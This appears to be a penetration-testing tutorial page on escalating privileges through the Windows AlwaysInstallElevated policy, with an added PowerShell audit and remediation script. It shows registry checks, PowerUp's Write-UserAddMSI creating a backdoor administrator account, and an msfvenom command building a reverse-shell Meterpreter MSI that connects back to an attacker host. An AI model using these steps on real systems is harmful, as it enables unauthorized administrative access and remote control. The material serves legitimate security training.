💽AlwaysInstallElevated

AlwaysInstallElevated is a functionality within Windows that allows all users, including non-administrative ones, to automatically run any MSI (Microsoft Installer) file with elevated privileges. This capability can be exploited in the context of Windows privilege escalation. When an attacker leverages the AlwaysInstallElevated setting, they can manipulate MSI packages to execute arbitrary code with elevated permissions, potentially leading to unauthorized access and control over the system.

To escalate privileges using AlwaysInstallElevated, attackers can create and deploy malicious MSI files, taking advantage of the automatic elevation granted by this setting. By doing so, they can execute code in the context of higher-privileged accounts, achieving a form of privilege escalation.

First we need to check whether AlwaysInstallElevated is set to 1:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

Now, in the same cmd prompt, we also query the current-user hive:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

  1. reg query HKLM\Software\Policies\Microsoft\Windows\Installer queries the local machine's registry for Windows Installer policies at the system level [1].

  2. reg query HKCU\Software\Policies\Microsoft\Windows\Installer queries the current user's registry for Windows Installer policies specific to that user [1].

These commands target different registry hives. The former looks at the machine-wide settings, affecting all users, while the latter focuses on settings applicable only to the currently logged-in user.
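As an added audit example (not part of the original page), the same two queries as a PowerShell script that reports each hive separately and, as a remediation step, resets both values to 0. Windows Installer only honours the policy when both the HKLM and HKCU values are 1, so the `Effective` field shows whether the misconfiguration is actually live; the function names `Get-AlwaysInstallElevatedStatus` and `Disable-AlwaysInstallElevated` are my own and not part of any tool.

```powershell
# Added audit/remediation example; registry paths and value name are the ones queried above.
# The policy is effective only when BOTH HKLM and HKCU values are 1.

$InstallerPolicyPaths = [ordered]@{
    'HKLM' = 'HKLM:\Software\Policies\Microsoft\Windows\Installer'
    'HKCU' = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedStatus {
    # Hypothetical helper name: reads both hives and reports whether the policy is live.
    $result = [ordered]@{}
    foreach ($hive in $InstallerPolicyPaths.Keys) {
        # A missing key or value means the policy is not set; treat that as 0.
        $item = Get-ItemProperty -Path $InstallerPolicyPaths[$hive] `
                                 -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
        if ($null -ne $item) { $result[$hive] = [int]$item.AlwaysInstallElevated }
        else                 { $result[$hive] = 0 }
    }
    $result['Effective'] = ($result['HKLM'] -eq 1) -and ($result['HKCU'] -eq 1)
    return [pscustomobject]$result
}

function Disable-AlwaysInstallElevated {
    # Hypothetical helper name: hardening step, sets both values to 0.
    # Writing the HKLM key requires an elevated (administrator) prompt.
    foreach ($path in $InstallerPolicyPaths.Values) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
    }
}

$status = Get-AlwaysInstallElevatedStatus
$status | Format-List
if ($status.Effective) {
    Write-Warning 'AlwaysInstallElevated is effective: any user can install MSI packages with SYSTEM privileges.'
    # Uncomment on a machine you administer to remediate:
    # Disable-AlwaysInstallElevated
}
```

Because the HKCU value is per user, run the audit in the context of the account being assessed, not only from an administrator session.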

Microsoft - reg query

Let's check who is in the local Administrators group:

net localgroup administrators

The net localgroup administrators command displays the members of the local "Administrators" group on a Windows computer. Running it in the command prompt shows which accounts hold local administrative privileges on the system.

In the autorun section we launched the PowerUp tool:

We simply look for the AlwaysInstallElevated part in the script output.

The output tells us that PowerUp's abuse function for AlwaysInstallElevated is Write-UserAddMSI.

  1. Function Purpose: "Write-UserAddMSI" is designed to exploit the "AlwaysInstallElevated" registry setting in Windows. This setting allows non-administrative users to install Microsoft Installer Packages (MSI) with elevated privileges.

  2. Malicious MSI Creation: The function creates an MSI package (UserAdd.msi) that, when executed, adds a new user with elevated privileges.

  3. Privilege Escalation: By abusing "AlwaysInstallElevated" with "Write-UserAddMSI," an attacker can escalate their privileges, potentially gaining administrative access on the system.

  4. Backdoor Installation: It suggests the ability to install a backdoor or perform actions that may compromise the security of the system.

Now let's abuse this by running:

Write-UserAddMSI

In essence, the command instructs PowerSploit (PowerUp) to create a new MSI file named "UserAdd.msi" in the current directory. This MSI file contains the instructions for adding a user, which we will abuse for privilege escalation.

If we look in the local directory, we can see the new file:

We double-click it and see something interesting:

It asks us to add a user to the Administrators group. Checkmate.

And if we run the net localgroup administrators command again:

Our backdoor user has been added to the group.

Let's do this another way.

On your local Kali machine, open msfconsole and start a reverse-shell handler:

Now, in another terminal, run:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi

  • msfvenom: This is the command-line interface for Metasploit's payload generator.

  • -p windows/meterpreter/reverse_tcp: Specifies the payload to be generated. In this case, it's a reverse TCP Meterpreter shell for a Windows target.

  • lhost=[Kali VM IP Address]: Sets the listening host IP address. Replace [Kali VM IP Address] with the actual IP address of your Kali Linux machine. This is the IP where the target machine will connect back.

  • -f msi: Specifies the format of the output file. Here, it's set to MSI (Microsoft Installer).

  • -o setup.msi: Specifies the output file name, which is set to setup.msi. This is the name of the generated MSI file.

Now we need to get this payload onto the target, so let's start a local HTTP server:

We didn't pick a very secure place for our server, but hey, better luck next time.

And now on our listener:

Just like that, another way of obtaining a shell 😄
